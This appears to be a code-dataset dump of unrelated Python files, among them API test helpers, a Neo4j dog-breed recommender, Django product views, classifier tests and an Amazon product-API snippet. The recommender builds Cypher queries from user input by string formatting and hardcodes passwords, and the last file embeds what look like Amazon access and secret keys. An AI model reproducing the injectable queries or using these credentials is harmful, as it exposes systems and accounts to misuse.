\"start_timestamp\": start_timestamp,\n \"end_timestamp\": end_timestamp,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/calendar-event\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef list_calendars(\n order_by: str = \"ORDER_BY_CREATE_TIMESTAMP_ASC\",\n name_pattern_match_pattern: str = None,\n name_pattern_match_match_type: str = \"MATCH_TYPE_UNKNOWN\",\n) -> List[Dict[str, Any]]:\n body = {\n \"order_by\": order_by,\n \"name_pattern_match.pattern\": name_pattern_match_pattern,\n \"name_pattern_match.match_type\": name_pattern_match_match_type,\n }\n resp = endtoend.helper.list_resources(\"calendars\", params=body)\n\n return resp\n\n\ndef create_calendar(\n calendar_id: str,\n is_active: bool = False,\n display_name: str = \"\",\n description: str = \"\",\n) -> Dict[str, str]:\n\n display_name = display_name or calendar_id\n description = description or calendar_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar\": {\n \"id\": calendar_id,\n \"is_active\": is_active,\n \"display_name\": display_name,\n \"description\": description,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/calendar\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef update_calendar(\n calendar_id: str,\n is_active: bool = None,\n display_name: str = None,\n description: str = None,\n) -> Dict[str, str]:\n\n updated_fields = {}\n if is_active is not None:\n updated_fields[\"is_active\"] = is_active\n if display_name is not None:\n updated_fields[\"display_name\"] = display_name\n if description is not None:\n updated_fields[\"description\"] = description\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar\": updated_fields,\n \"update_mask\": {\"paths\": list(updated_fields.keys())},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", f\"/v1/calendar/{calendar_id}:updateDetails\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef get_contract_modules() -> List[Dict[str, Any]]:\n\n resp = endtoend.helper.list_resources(\"contract-modules\", params=None)\n\n return resp\n\n\ndef get_contract_module_versions(\n contract_module_id: str = \"\",\n) -> List[Dict[str, Any]]:\n\n body = {\n \"contract_module_id\": contract_module_id,\n }\n resp = endtoend.helper.list_resources(\n \"contract-module-versions\", params=body, page_size=10\n )\n\n return resp\n\n\ndef get_smart_contract_module_version_links(\n contract_version_id: str,\n) -> List[Dict[str, Any]]:\n\n resp = endtoend.helper.list_resources(\n \"smart-contract-module-versions-links\",\n params={\"smart_contract_version_ids\": contract_version_id},\n )\n\n return resp\n\n\ndef get_postings_api_client(\n client_id: str,\n) -> Dict[str, str]:\n return endtoend.helper.send_request(\"get\", \"/v1/postings-api-clients/\" + client_id)\n\n\ndef create_postings_api_client(\n request_id: str,\n client_id: str,\n response_topic: str,\n) -> Dict[str, str]:\n post_body = {\n \"request_id\": request_id,\n \"postings_api_client\": {\n \"id\": client_id,\n \"response_topic\": response_topic,\n },\n }\n\n return endtoend.helper.send_request(\n \"post\", \"/v1/postings-api-clients\", data=json.dumps(post_body)\n )\n\n\ndef init_postings_api_client(\n client_id: str, response_topic: str, timeout: int = 5\n) -> Dict[str, str]:\n \"\"\"\n Postings API client can be missing on the target instance (i.e. bootstrap job as part of DR)\n so ensure it's created if it cannot be found.\n \"\"\"\n for i in range(timeout):\n try:\n return get_postings_api_client(client_id)\n except HTTPError as e:\n if \"404\" not in e.args[0]:\n if i < timeout:\n time.sleep(1)\n continue\n raise HTTPError(\n \"Unexpected error when trying to connect to endpoint /v1/postings-api-clients\"\n ) from e\n\n log.info(\n \"Could not find existing Postings API Client with ID: %s.\"\n \"Creating new Postings API Client with above ID.\",\n client_id,\n )\n return create_postings_api_client(\n request_id=str(uuid.uuid4()),\n client_id=client_id,\n response_topic=response_topic,\n )\n","sub_path":"common/test_utils/endtoend/core_api_helper.py","file_name":"core_api_helper.py","file_ext":"py","file_size_in_byte":32933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603214129","text":"import difflib\n\nimport betterbib\n\n# import time\n\n\ndef _main():\n # args = _parse_cmd_arguments()\n\n source = betterbib.Crossref()\n\n # t = time.time()\n _test_connection(source)\n # elapsed = time.time() - t\n # print(\"OK ({}s).\".format(elapsed))\n # try:\n # except:\n # print(\"FAILED.\\n\")\n # raise\n return\n\n\ndef _test_connection(source):\n\n test_entry = {\n \"genre\": \"book\",\n \"title\": \"A Framework for Deflated and Augmented \" \"Krylov Subspace Methods\",\n \"author\": \"Gaul and Liesen\",\n \"year\": \"2013\",\n }\n\n # Define the expected return string. Note that special characters need\n # to be escaped.\n expected = \"\"\"@book {MR3024841,\n AUTHOR = {Liesen, J{\\\\\"o}rg and Strako{\\\\v{s}}, Zden{\\\\v{e}}k},\n TITLE = {Krylov subspace methods},\n SERIES = {Numerical Mathematics and Scientific Computation},\n NOTE = {Principles and analysis},\n PUBLISHER = {Oxford University Press, Oxford},\n YEAR = {2013},\n PAGES = {xvi+391},\n ISBN = {978-0-19-965541-0},\n MRCLASS = {65F10 (65F15)},\n MRNUMBER = {3024841},\nMRREVIEWER = {Melina A. Freitag},\n}\"\"\"\n\n bt = source.find_unique(test_entry)\n print(bt)\n\n # Check the result.\n if bt != expected:\n diff = difflib.Differ().compare(bt, expected)\n diff = \"\".join(\n [\n \"***\" + i[2:] + \"***\" if i[:1] == \"+\" else i[2:]\n for i in diff\n if not i[:1] in \"-?\"\n ]\n )\n print\n print(\"Unexpected test result. Differences:\")\n print(diff)\n print\n raise RuntimeError(\"Connection established, but wrong search result.\")\n return\n\n\ndef _parse_cmd_arguments():\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Test a BibTeX source.\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n _main()\n","sub_path":"tools/test-source.py","file_name":"test-source.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507514133","text":"\"\"\"\nAutores: Sebastian Aristondo, Daniel Gonzalez, Juan Carlos Bajan.\nModificacion: 31/05/2021\nDescripcion: Programa que permite realizar una recomendacion de perros.\n\"\"\"\n\nfrom neo4j import GraphDatabase\nfrom connection import *\nimport random\n\n\nañesartnoc=\"Computologo\"\n\n\"\"\"\n--------------------Terminos Y Condiciones--------------------\nPara que el proceso de recomendacion se pueda llevar a cabo,\nel usuario debe estar de acuerdo con ello y aceptar los\nterminos y condiciones de la misma. Para ello se inicia\npreguntandole al usuario si las acepta o no\n--------------------------------------------------------------\n\"\"\"\ndef TerminosYCondiciones():\n respuesta=\"\"\n while respuesta==\"\":\n print(\"\"\"----------------Terminos y Condicioness--------------- \\n\n Este sistema de recomendación, requiere de información porporcionada por usted,\n esta sirve unicamente con el proposito de brindarle una recomendación acertada. Los datos\n que se obtiene son totalmente privados. El sistema de recomendación desea pedirle permiso \n para utilizar el resultado del perro que se le recomienda para agregarlo a un ranking y asi \n mejorar las recomendaciones \\n ¿Acepta? \n \"\"\")\n respuesta=input(\"Si/No \\n\")\n if respuesta.lower()==\"si\" or respuesta.lower()==\"no\":\n if respuesta.lower()==\"si\":\n return True\n elif respuesta.lower()==\"si\":\n return False\n else:\n respuesta=\"\"\n\n\n\n\"\"\"\n--------------------- agregar -------------------------\nCon el fin de mejorar el sistema de recomendacion, se diseno\nuna opcion para agregar mas componentes al grafo. En esta opcion\nel usuario ingresa (raza, comportamiento, espacio, tipo de pelo,\ntamano, complexion corporal, actividad fisica, expectativa de vida,\nhocico y orejas)\n--------------------------------------------------------------\n\"\"\"\ndef agregar(connection, db):\n #Se le solicita al usuario que ingrese una contrasena\n palabra=input(\"Por favor ingrese la palabra clave \\n\")\n if palabra == añesartnoc:\n # Se le solicita al usuario que ingrese la raza y las caracteristicas del nuevo perro\n raza=input(\"Ingrese el nombre de la raza del perro a agregar a la base de datos \\n >\")\n datos = {\"Comportamiento\":\"\", \"Espacio\":\"\",\"TipoPelo\":\"\", \"Tamano\": \"\", \"ComplexionCorporal\":\"\",\"ActividadFisica\":\"\",\"ExpectativaDeVida\":\"\", \"Hocico\": \"\",\"Orejas\":\"\"}\n # El ciclo FOR recorre el diccionario datos y guarda la informacion que el usuario ingrese.\n for keys in datos:\n print(\"Seleccione la opcion con la que se siente más identificado según \"+keys )\n dictionary = elementos(connection, db, keys)\n elec = eleccion(dictionary)\n datos[keys] = elec\n # Se le asigna un ranking de 0 porque al ser un dato nuevo, no se le ha recomendado a nadie\n datos[\"Ranking\"]=0\n # Se envia el primer query para crear un perro\n query = '''\n CREATE (p:Perro{raza:\"%s\", ranking:'0'})\n '''%(raza)\n connection.query(query, db)\n # Se envia otro query uniendo al perro con sus caracteristicas. Se envia en estructura del codigo de cypher para que la plataforma entienda el query.\n query='''MATCH (p:Perro) WHERE p.raza = '%s'\n MATCH (p1:Comportamiento) WHERE p1.comportamiento = '%s' \n MERGE (p) -[:Comportamiento]-> (p1) WITH p\n MATCH (p2:Espacio) WHERE p2.espacio = '%s'\n MERGE (p) -[:Espacio]->(p2) WITH p\n MATCH (p3:TipoPelo) WHERE p3.tipoPelo = '%s' \n MERGE (p) -[:Espacio]->(p3) WITH p\n MATCH (p4:Tamano) WHERE p4.tamano = '%s' \n MERGE (p) -[:Tamano]->(p4) WITH p\n MATCH (p5:ComplexionCorporal) WHERE p5.complexionCorporal = '%s' \n MERGE (p) -[:ComplexionCorporal]->(p5) WITH p\n MATCH (p6:ActividadFisica) WHERE p6.actividadFisica = '%s'\n MERGE (p)-[:ActividadFisica]-> (p6) WITH p\n MATCH (p7:ExpectativaDeVida) WHERE p7.expectativaDeVida = '%s'\n MERGE (p)-[:ExpectativaDeVida]-> (p7) WITH p\n MATCH (p8:ExpectativaDeVida) WHERE p8.expectativaDeVida = '%s' \n MERGE (p)-[:Hocico]-> (p8) WITH p\n MATCH (p9:Orejas) WHERE p9.orejas = '%s'\n MERGE (p)-[:Orejas]-> (p9) return p\n '''%(raza,datos['Comportamiento'],datos['Espacio'],datos['TipoPelo'],datos['Tamano'],datos['ComplexionCorporal'],datos['ActividadFisica'],datos['ExpectativaDeVida'],datos['Hocico'], datos['Orejas'])\n connection.query(query, db)\n else:\n #Si la contrasena es incorrecta se le indica al usuario\n print(\"Palabra clave incorrecta, Esta opción es unicamente para personal calificado\")\n\n\n\"\"\"\n--------------------- quitar --------------------------\nAsi como se puede anadir un componente tambien se puede eliminar,\npara esto se diseno una herramienta para eliminar comparando el nombre\nque se ingreso con las razas almacenadas.\n--------------------------------------------------------------\n\"\"\"\ndef quitar(connection, db):\n #Se le solicita al usuario que ingrese una contrasena\n palabra=input(\"Por favor ingrese la palabra clave\\n\")\n if palabra == añesartnoc:\n condicion=True\n query = 'MATCH (n:Perro) return n.raza'\n temp = connection.query(query, db)\n i = 1\n dictionary = {}\n # Se hace un ciclo while para imprimir todos los perros del grafo y luego devolver el perro que el usuario haya ingresado\n while condicion:\n for elements in temp:\n dictionary[i] = elements['n.raza']\n print(f\"{i}) {dictionary[i]}\")\n i = i+1\n perro= input(\"Ingrese el numero del perro que desea eliminar\")\n try:\n perro = int(perro)\n if perro\")\n try:\n elecop= int(elecop)\n if elecop > len(dic):\n print(f\"La opcion {elecop} no se encuentra entre las opciones\") \n else:\n return dic[elecop]\n bandera=False\n except ValueError:\n print(\"Porfavor ingrese la opción en formato de numero\")\n\n\n\n\"\"\"\n--------------- aumentar ranking ----------------------\nEsta Funcion aumenta el ranking del perro recomendado cada vez\nque se muestra al usuario.\n--------------------------------------------------------------\n\"\"\"\ndef aumentar_ranking(raza):\n query ='''\n MATCH (p:Perro{raza:\"%s\"}) return p.ranking'''%(raza)\n #result = \n\n\n\"\"\"\n------------------- resultado -------------------------\nEsta Funcion muestra al usuario el resultado obtenido por\nla busqueda.\n--------------------------------------------------------------\n\"\"\"\ndef resultado(query):\n perros = []\n for elements in query:\n perros.append(elements['p.raza'])\n\n i = random.randint(0,len(perros)-1)\n return perros[i]\n \n\n\"\"\"\n---------------- ConsultaUsuario ----------------------\nEsta Funcion solicita al usuario las caracteristicas que \ndesea que el su perro tenga, en base a esto se hace un query a\nla base de datos de Neo4J y se le da una respuesta.\n--------------------------------------------------------------\n\"\"\"\ndef ConsultaUsuario(connection, db):\n datos = {\"Comportamiento\":\"\", \"Espacio\":\"\",\"TipoPelo\":\"\", \"Tamano\": \"\", \"ComplexionCorporal\":\"\",\"ActividadFisica\":\"\",\"ExpectativaDeVida\":\"\", \"Hocico\": \"\",\"Orejas\":\"\"}\n # Se solicita al usuario la opcion que desee segun la caracteristica\n for keys in datos:\n print(\"Seleccione la opcion con la que se siente más identificado según \"+keys)\n dictionary = elementos(connection, db, keys)\n elec = eleccion(dictionary)\n datos[keys] = elec\n recomendacion = \"\"\n # Se le envia a la base de datos el query con las caracteristicas que selecciono el usuario\n query ='''\n MATCH (p:Perro)-[:Comportamiento]->(p1:Comportamiento{comportamiento:\"%s\"}),\n (p)-[:Espacio]-> (p4:Espacio{espacio:\"%s\"}),\n (p)-[:TipoPelo]-> (p5:TipoPelo{tipoPelo:\"%s\"}),\n (p)-[:Tamano]-> (p6:Tamano{tamano:\"%s\"}),\n (p)-[:ComplexionCorporal]-> (p7:ComplexionCorporal{complexionCorporal:\"%s\"}),\n (p)-[:ActividadFisica]-> (p8:ActividadFisica{actividadFisica:\"%s\"}),\n (p)-[:ExpectativaDeVida]-> (p9:ExpectativaDeVida{expectativaDeVida:\"%s\"}),\n (p)-[:Hocico]-> (p10:Hocico{hocico:\"%s\"}),\n (p)-[:Orejas]-> (p11:Orejas{orejas:\"%s\"}) return p.raza, p.ranking\n '''%(datos['Comportamiento'],datos['Espacio'],datos['TipoPelo'],datos['Tamano'],datos['ComplexionCorporal'],datos['ActividadFisica'],datos['ExpectativaDeVida'],datos['Hocico'], datos['Orejas'])\n query_result = connection.query(query, db)\n #Si se encuentra entonces se muestra al usuario.\n if query_result:\n recomendacion = query_ranking(connection, query_result)\n #En caso que no se encuentren, entonces se realiza un query con menos opciones\n elif not query_result:\n query ='''MATCH (p:Perro)-[:Comportamiento]->(p5:Comportamiento{comportamiento:\"%s\"}),\n (p)-[:Espacio]-> (p2:Espacio{espacio:\"%s\"}),\n (p)-[:Tamano]-> (p3:Tamano{tamano:\"%s\"}) return p.raza, p.ranking\n '''%(datos['Comportamiento'],datos['Espacio'],datos['Tamano'])\n query_result = connection.query(query, db)\n if query_result:\n recomendacion = query_ranking(connection, query_result)\n #En caso que no se encuentre de nuevo, se vuelve a hacer un query solo con el comportamiento.\n elif not query_result:\n query ='''MATCH (p:Perro)-[:Comportamiento]->(p5:Comportamiento{comportamiento:\"%s\"}) return p.raza, p.ranking\n '''%(datos['Comportamiento'])\n query_result = connection.query(query, db)\n recomendacion = query_ranking(connection, query_result)\n \n return recomendacion\n\n\n\n#Conexiones a base de datos.\nconn = Neo4jConnection(uri=\"bolt://localhost:####\", user=\"neo4j\", pwd=\"1234\")\ndb = 'neo4j'\n#temp = elementos(conn, db, \"Personalidad\", \"Personalidad\")\n#print(temp)\n\n#-----------------------Inicio del menu--------------------------------\nprint(\"¡Bienvenidos al sistema de recomendación de perros!\")\nperro = '''\n░░░░░░▄█▄█░░░░░▄░░░░░░\n░░░░██████░░░░░░█░░░░░\n░░░░░░███████████░░░░░\n▒▒▒▒▒▒█▀▀█▀▀██▀██▒▒▒▒▒\n▒▒▒▒▒▄█▒▄█▒▒▄█▒▄█▒▒▒▒▒\n'''\nprint(perro)\n\nperro = '''\n ___\n __/_ `. .-\"\"\"-.\n \\_,` | \\-' / )`-')\n \"\") `\"` \\ ((`\"`\n ___Y , .'7 /|\n(_,___/...-` (_/_/ \n'''\n\ncontinuar=True\nTYC=TerminosYCondiciones()\nwhile(continuar):\n print(\"\\n1)Realizar recomendación\")\n print(\"2)Agregar a la base de datos\")\n print(\"3)Eliminar de la base de datos\")\n print(\"4)Salir\\n\")\n op1=input(\"¿Que opción desea realizar?\\n>\")\n try:\n op1=int (op1)\n \n except ValueError:\n print(\"Opcion no valida\")\n\n if op1==1:\n RecomendacionExitosa=ConsultaUsuario(conn, db)\n print(f\"Se le recomienda conseguir un perro de raza: {RecomendacionExitosa}\")\n print(perro)\n elif op1==2:#Agregar a la base de datos\n agregar(conn,db)\n elif op1==3:#Quitar de la base de datos\n quitar(conn,db)\n elif op1==4:\n continuar=False\n print(\"Muchas gracias por utilizar el sistema de recomendacion\") \n\n","sub_path":"Codigo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"516523093","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import CreateView, DetailView, UpdateView, DeleteView\n\nfrom adminapp.forms import ProductEditForm\nfrom mainapp.models import ProductCategory, Product\n\n\n# вычисляю pk товара, для формирования обратных адресов на текущую категорию товара\ndef get_pk(self):\n if len(Product.objects.filter(category_id=self.kwargs.get('pk'))) > 0:\n return Product.objects.filter(category_id=self.kwargs.get('pk'))\n else:\n return {'category': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")),\n 'pk': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")).pk},\n###################################################################################\n\n\nclass ProductCreateView(CreateView):\n model = Product\n form_class = ProductEditForm\n template_name = 'adminapp/product_create.html'\n success_url = reverse_lazy('admin_stuff:products')\n\n def get_success_url(self):\n return reverse_lazy('admin_stuff:products',\n kwargs={'pk': ProductCategory.objects.get(id=self.kwargs.get(\"pk\")).pk})\n\n def get_initial(self):\n initial = super(ProductCreateView, self).get_initial()\n initial['category'] = get_object_or_404(ProductCategory, pk=self.kwargs.get('pk'))\n initial['price'] = ''\n initial['quantity'] = ''\n return initial\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Создание нового продукта'\n context['product'] = get_pk(self)\n return context\n\n\nclass ProductsCreateView(CreateView):\n model = Product\n template_name = 'adminapp/products.html'\n form_class = ProductEditForm\n context_object_name = 'product'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = f'Товары категории \"{ProductCategory.objects.filter(id=self.kwargs.get(\"pk\"))}\"' # ДОДЕЛАТЬ!!!!!!!! prod.0.category\n context['object_list'] = Product.objects.filter(category_id=self.kwargs.get('pk'))\n context['prod'] = get_pk(self)\n return context\n\n\nclass ProductDetailView(DetailView):\n model = Product\n template_name = 'adminapp/product_read.html'\n\n def get_context_data(self, **kwargs):\n content = super().get_context_data(**kwargs)\n content['title'] = f'продукт/{self.object.name}'\n return content\n\n\nclass ProductUpdateView(UpdateView):\n model = Product\n template_name = 'adminapp/product_update.html'\n success_url = 'admin_stuff:products'\n form_class = ProductEditForm\n\n def get_success_url(self):\n product = get_object_or_404(Product, pk=self.kwargs['pk'])\n return reverse_lazy('admin_stuff:products', kwargs={'pk': product.category.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = f'Редактировние {self.object.name}'\n return context\n\n\nclass ProductDeleteView(DeleteView):\n model = Product\n template_name = 'adminapp/product_delete.html'\n success_url = 'admin_stuff:products'\n\n def get_success_url(self):\n product = get_object_or_404(Product, pk=self.kwargs['pk'])\n return reverse_lazy('admin_stuff:products', kwargs={'pk': product.category.pk})\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = f'Удаление {self.object.name}'\n return context\n\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n self.object.is_deleted = True\n self.object.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\n","sub_path":"logbox_shop/adminapp/views_products/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454902515","text":"# DN4\n\nfrom math import *\n\n# ogrevalna naloga: koordinate\n\ndef koordinate(ime, kraji):\n for kraj ,x, y in kraji:\n if kraj == ime:\n return x, y\n\n# ogrevalna naloga: razdalja_koordinat\n\ndef razdalja_koordinat(x1, y1, x2, y2):\n return sqrt ((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n# ogrevalna naloga: razdalja_krajev\n\ndef razdalja(ime1, ime2, kraji):\n x1, y1 = koordinate (ime1, kraji)\n x2, y2 = koordinate (ime2, kraji)\n return razdalja_koordinat (x1, y1, x2, y2)\n\n# obvezna naloga: v_dometu\n\ndef v_dometu(ime, domet, kraji):\n seznam_krajev = []\n for kraj, x, y in kraji:\n if kraj == ime:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if razdalja <= domet and razdalja != 0:\n seznam_krajev.append(tarce)\n return seznam_krajev\n\n# obvezna naloga: najbolj_oddaljeni\n\ndef najbolj_oddaljeni(ime, imena, kraji):\n naj_oddaljen = 0\n for kraj, x, y in kraji:\n if kraj == ime:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n for mesto in imena:\n if mesto == tarce:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if razdalja > naj_oddaljen:\n naj_oddaljen = razdalja\n oddaljen_kraj = mesto\n return oddaljen_kraj\n\n# obvezna naloga: zalijemo\n\ndef zalijemo(ime, domet, kraji):\n naj_oddaljen = 0\n for kraj, x, y in kraji:\n if kraj == ime:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja and naj_oddaljen <= razdalja:\n naj_oddaljen = razdalja\n oddaljen_kraj = tarce\n return oddaljen_kraj\n\n# dodatna naloga: presek\n\ndef presek(s1, s2):\n presek = []\n for e1 in s1:\n for e2 in s2:\n if e1 == e2:\n presek.append(e1)\n\n return presek\n\n# dodatna naloga: skupno_zalivanje\n\ndef skupno_zalivanje(ime1, ime2, domet, kraji):\n tarce_ime1 = []\n tarce_ime2 = []\n presek = []\n for kraj, x, y in kraji:\n if kraj == ime1:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja:\n tarce_ime1.append (tarce)\n if kraj == ime2:\n x1, y1 = x, y\n for tarce, x2, y2 in kraji:\n razdalja = sqrt ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if domet >= razdalja:\n tarce_ime2.append (tarce)\n for e1 in tarce_ime1:\n for e2 in tarce_ime2:\n if e1 == e2:\n presek.append(e1)\n return presek\n\n\n\n\n\n\n\n\n","sub_path":"code/batch-1/vse-naloge-brez-testov/DN4-M-161.py","file_name":"DN4-M-161.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337491086","text":"\nimport subprocess\nimport os\nimport os.path\n\nimport sklearn\nimport numpy\nfrom sklearn import datasets\nfrom sklearn import model_selection\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.utils.estimator_checks import check_estimator \n\nimport emtrees\n\n\n\ndef build_classifier(estimator, name='test_trees', temp_dir='tmp/', func=None):\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n tree_name = name\n if func is None:\n func = 'emtrees_predict(&{}, values, length)'.format(tree_name)\n def_file = os.path.join(temp_dir, name+'.def.h')\n code_file = os.path.join(temp_dir, name+'.c')\n bin_path = os.path.join(temp_dir, name)\n\n # Trivial program that reads values on stdin, and returns classifications on stdout\n code = \"\"\"\n #include \"emtrees_test.h\"\n #include \"{def_file}\"\n\n static void classify(const EmtreesValue *values, int length, int row) {{\n const int32_t class = {func};\n printf(\"%d,%d\\\\n\", row, class);\n }}\n int main() {{\n emtrees_test_read_csv(stdin, classify);\n }}\n \"\"\".format(**locals())\n\n with open(def_file, 'w') as f:\n f.write(estimator.output_c(tree_name))\n\n with open(code_file, 'w') as f:\n f.write(code)\n\n args = [ 'cc', '-std=c99', code_file, '-o', bin_path, '-I./test', '-I.' ]\n subprocess.check_call(args)\n\n return bin_path\n\ndef run_classifier(bin_path, data):\n lines = []\n for row in data:\n lines.append(\",\".join(str(v) for v in row))\n stdin = '\\n'.join(lines)\n\n args = [ bin_path ]\n out = subprocess.check_output(args, input=stdin, encoding='utf8', universal_newlines=True)\n\n classes = []\n for line in out.split('\\n'):\n if line:\n row,class_ = line.split(',')\n class_ = int(class_)\n classes.append(class_)\n\n assert len(classes) == len(data)\n\n return classes\n\ndef test_randomforest_api():\n check_estimator(emtrees.RandomForest)\n\ndef test_extratrees_api():\n check_estimator(emtrees.ExtraTrees)\n\n\ndef test_basic_binary_classification():\n X, Y = datasets.make_classification(n_classes=2, n_samples=1000, random_state=1)\n trees = emtrees.RandomForest(n_estimators=10, max_depth=10, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n scores = model_selection.cross_val_score(trees, X, Y, scoring='accuracy')\n\n assert numpy.mean(scores) > 0.7, scores\n\ndef test_binary_classification_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees)\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 0.9 # testing on training data\n\ndef test_extratrees_classification_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.ExtraTrees(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees)\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 0.85 # testing on training data\n\ndef test_inline_compiled():\n X, Y = datasets.make_classification(n_classes=2, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n p = build_classifier(trees, 'myinline', func='myinline_predict(values, length)')\n predicted = run_classifier(p, X)\n accuracy = metrics.accuracy_score(Y, predicted)\n\n assert accuracy > 0.9 # testing on training data\n\n\ndef test_deduplicate_single_tree():\n nodes = [\n [ -1, 1, -1, -1 ],\n [ -1, 0, -1, -1 ],\n [ 2, 666, 0, 1 ],\n [ -1, 1, -1, -1 ], # dup leaf. idx=3\n [ 4, 333, 1, 3 ], # dup ref\n [ 5, 444, 2, 1],\n [ 6, 555, 4, 5],\n ]\n roots = [ 6 ]\n\n de_nodes, de_roots = emtrees.randomforest.remove_duplicate_leaves((nodes, roots))\n\n duplicates = 1\n assert len(de_roots) == len(roots)\n assert len(de_nodes) == len(nodes) - duplicates\n assert de_roots[0] == roots[0] - duplicates\n\ndef test_trees_to_dot():\n X, Y = datasets.make_classification(n_classes=2, n_samples=10, random_state=1)\n trees = emtrees.RandomForest(n_estimators=3, max_depth=5, random_state=1)\n X = (X * 2**16).astype(int) # convert to integer\n trees.fit(X, Y)\n\n dot = trees.to_dot(name='ffoo')\n with open('tmp/trees.dot', 'w') as f:\n f.write(dot)\n","sub_path":"test/test_emtrees.py","file_name":"test_emtrees.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274332675","text":"# Copyright 2019 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.balance_strategies.full_sampling import FullSampleTD\nfrom asreview.balance_strategies.triple_balance import TripleBalanceTD\nfrom asreview.balance_strategies.undersampling import UndersampleTD\n\n\ndef get_balance_strategy(method, balance_param={},\n query_kwargs={\"query_src\": {}}):\n if method == \"simple\":\n td_obj = FullSampleTD(balance_param)\n elif method == \"triple_balance\":\n td_obj = TripleBalanceTD(balance_param, query_kwargs)\n elif method in [\"undersample\", \"undersampling\"]:\n td_obj = UndersampleTD(balance_param)\n else:\n raise ValueError(f\"Training data method {method} not found\")\n return td_obj.func_kwargs_descr()\n\n\ndef get_balance_with_settings(settings):\n \"\"\" Function to get data rebalancing method. \"\"\"\n\n method = getattr(settings, \"balance_strategy\", \"simple\")\n settings.balance_strategy = method\n\n func, settings.balance_kwargs, td_string = get_balance_strategy(\n method, settings.balance_param, settings.query_kwargs)\n return func, td_string\n\n\ndef get_balance_class(method):\n if method in [\"simple\", \"full\"]:\n return FullSampleTD\n if method in [\"triple\", \"triple_balance\"]:\n return TripleBalanceTD\n if method in [\"undersample\", \"undersampling\"]:\n return UndersampleTD\n","sub_path":"asreview/balance_strategies/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"111908064","text":"Access_Key='AKIAI37VVOBFMLGQYA5A'\t\t\n\nSecret_Key='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'\t\t\n\t\t\nTag='aggtrends-20'\n\nfrom amazon.api import AmazonAPI\namazon = AmazonAPI(Access_Key, Secret_Key, Tag)\nproduct = 